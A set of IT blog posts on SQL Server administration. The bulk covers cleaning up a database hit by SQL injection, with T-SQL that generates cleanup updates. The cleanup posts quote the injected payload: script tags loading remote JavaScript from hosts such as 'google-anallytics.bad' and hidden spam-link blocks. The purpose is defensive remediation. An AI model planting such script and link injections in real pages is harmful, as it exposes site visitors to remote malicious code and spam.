Upgrading SQL Server 2008 R2 from Evaluation to Licensed

As a Microsoft partner, we have access to software resources to help us do our jobs while getting ourselves familiar with the MS family of products.

We had an in-house project that needed SQL Server, so we installed SQL Server 2008 R2 Enterprise in Evaluation mode, since we didn’t have the product key handy.

Install went fine, server works great, everyone is happy.

170 or so days go by and we run an SSIS package and notice the warning “Evaluation Version, will expire in 8 days.” Wha? Do a quick SELECT @@VERSION and sure enough, we’re still running the evaluation version… in a production environment. (Facepalm!)

Searching around for how to turn my eval version into a licensed version (we finally got around to requesting the key from MS) showed all sorts of solutions, but none of them seemed to really fit the bill.

Some people admonished “You’re using Eval software in a production environment!?? Serves you right! Uninstall/reinstall!”; others required odd registry hacks to make the setup program run — it all seemed so complex for what should be a pretty simple process.

Lo and behold, buried at the very end of the comments attached to one of these complex blog posts, was the simplest of solutions from a chap named Waleed Al-Qudah:

“Go to Microsoft SQL Server Configuration Tools, and navigate to SQL Server installation Center then click the Maintenance link and choose Edition Upgrade.”

Two minutes later, we were all legal.

The SQL Server Installation Center is a fairly complicated-looking piece of software, and I never noticed that tab nor that option. Needless to say, I spent a few more minutes looking through it. 🙂

Connecting to SQL Server 2008 via TCP/IP on Windows 2008

Recently installed SQL Server 2008 on a Windows 2008 box and was happily administering it from the console of the local server. When I fired up SSMS (SQL Server Management Studio) from my development machine, it wouldn’t connect.

I turned the firewall off and still couldn’t connect.

Turns out TCP/IP isn’t turned on by default. Maybe I knew that at one time, but this time it totally slipped my mind.

To turn it on, go into SQL Server Configuration Manager, expand “SQL Server Network Configuration” and change “Disabled” to “Enabled” by right-clicking on “TCP/IP”. Suddenly, I could connect from my development machine.

Cleaning Up After a SQL Injection Attack, Part 2

Got a call today off our previous article in this series from Branden of Hot Media Group, Inc., a Chicago-based web application development, networking, and graphic design firm. He found himself with a database full of malware infections, but the characteristics of his attack didn’t match what we had written about, so he called us up. We reviewed his symptoms and were able to tweak the code we provided previously to work with this new set of issues.

We weren’t able to see how the site was attacked, nor did we worry about how the site would be steeled against future occurrence (always use stored procedures and/or parametrized queries, kids!) — this was purely a cleanup job.

This is the code we had:

-- Pass 1: text (35), nvarchar (231) and varchar (167) columns of user tables.
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
-- Only prints each UPDATE for review; nothing is executed here.
-- The first '' literal inside REPLACE is where the injected string to remove goes.
PRINT ('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'],'''', '''')')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

-- Pass 2: ntext (99) columns, cast to nvarchar(4000) so REPLACE can be applied.
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND b.xtype=99
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
PRINT ('UPDATE ['+@T+'] SET ['+@C+']=cast(replace(cast(['+@C+'] as nvarchar(4000)),'''','''') as ntext)')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

And that worked fine, but it had some shortcomings — mostly it only stripped out a single bit of invasive code, and our new friend had quite a bit of code to deal with, so instead of the almost quaint looking malware code:

<script src="hxxp://evilsite.evl/b.js"></script>

We had this jumble of code in every ntext field in his database:

<script type='text/javascript' src='http://google-anallytics.bad/urchin.js'></script>
<div style='display:none;'><a href='http://tests4all.bad/1/'>journals on losing post-pregnancy weight</a>
<a href='http://tests4all.bad/2/'>personal trainer certification atlanta</a>
<a href='http://tests4all.bad/3/'>quit smoking water vapor rings</a>
<a href='http://tests4all.bad/4/'>eyes in the darkness</a>
<a href='http://tests4all.bad/5/'>cheated map on dota 6.54b</a>
<a href='http://tests4all.bad/6/'>occupations for bored teen boys</a>
<a href='http://tests4all.bad/7/'>cgw southeast partners ilp</a>
<a href='http://tests4all.bad/8/'>does iq tests accurately measure intelligence</a>
<a href='http://tests4all.bad/9/'>free total psychic reading</a>
<a href='http://tests4all.bad/10/'>minnesota past life regression</a>
<a href='http://tests4all.bad/11/'>date of abraham lincolns death</a>

After trying to figure out the best way to escape all the single quotes, Branden — an accomplished ColdFusion developer — suggests “why don’t we just drop everything to the right of the <script> tag?”
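
Branden's suggestion above, sketched as T-SQL in the same generate-then-review style as the earlier script. This is an added example, not the code from the original article or its authors; it assumes SQL Server 2005 or later (for nvarchar(max)), that the injected markup was appended after the legitimate column content, and a constructed `<script` marker as the cut point.

```sql
-- Added example (not from the original post). Assumes SQL Server 2005+ and
-- that the injected markup was appended AFTER the legitimate column content.
-- It only generates statements; nothing is modified until you run them.
DECLARE @pat nvarchar(50);
SET @pat = N'%<script%';          -- PATINDEX pattern marking the cut point

SELECT
    -- Step 1: run this first to see how many rows each UPDATE would touch.
    N'SELECT COUNT(*) AS hits FROM ' + tbl
      + N' WHERE PATINDEX(N''' + @pat + N''', ' + val + N') > 0;' AS preview_sql,
    -- Step 2: keep only the text to the left of the first match.
    N'UPDATE ' + tbl + N' SET ' + col + N' = '
      + CASE WHEN typ IN ('text', 'ntext')           -- LOB types need a cast back
             THEN N'CAST(' + cut + N' AS ' + typ + N')'
             ELSE cut END
      + N' WHERE PATINDEX(N''' + @pat + N''', ' + val + N') > 0;' AS update_sql
FROM (
    SELECT tbl, col, typ, val,
           N'LEFT(' + val + N', PATINDEX(N''' + @pat + N''', ' + val + N') - 1)' AS cut
    FROM (
        SELECT QUOTENAME(c.TABLE_SCHEMA) + N'.' + QUOTENAME(c.TABLE_NAME) AS tbl,
               QUOTENAME(c.COLUMN_NAME) AS col,
               c.DATA_TYPE AS typ,
               -- Work on an nvarchar(max) copy so LEFT/PATINDEX behave the same
               -- for varchar, nvarchar, text and ntext columns.
               N'CAST(' + QUOTENAME(c.COLUMN_NAME) + N' AS nvarchar(max))' AS val
        FROM INFORMATION_SCHEMA.COLUMNS AS c
        JOIN INFORMATION_SCHEMA.TABLES AS t
          ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
        WHERE t.TABLE_TYPE = 'BASE TABLE'             -- skip views
          AND c.DATA_TYPE IN ('varchar', 'nvarchar', 'text', 'ntext')
    ) AS cols
) AS gen
ORDER BY tbl, col;
```

Take a backup and run each preview_sql before its update_sql. A column whose legitimate content contains its own script tag is cut at that tag too, so review the affected rows before updating.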

How To Clean Up After a SQL Injection Attack

NEW AND IMPROVED UPDATE: Cleaning Up After a SQL Injection Attack, Part 2

[UPDATE: Added code to deal with replacing text in the ntext fields of SQL Server 2000.]

One of our clients got hit with a web attack a week or so ago. We’re still not quite sure how this particular attack was carried out — we’re thinking an unpatched web server at the hosting facility — but it did cause me to look at the log file of the web site to see who might have been able to overwrite index.htm in the root directory. (The FTP logs held the clue — a rogue in Asia who cracked the password.)

As I said, it turned up nothing, but I did see a series of SQL Injection attacks — none of which were successful (always check your variables, kids!) — but they piqued my interest, so I took it apart.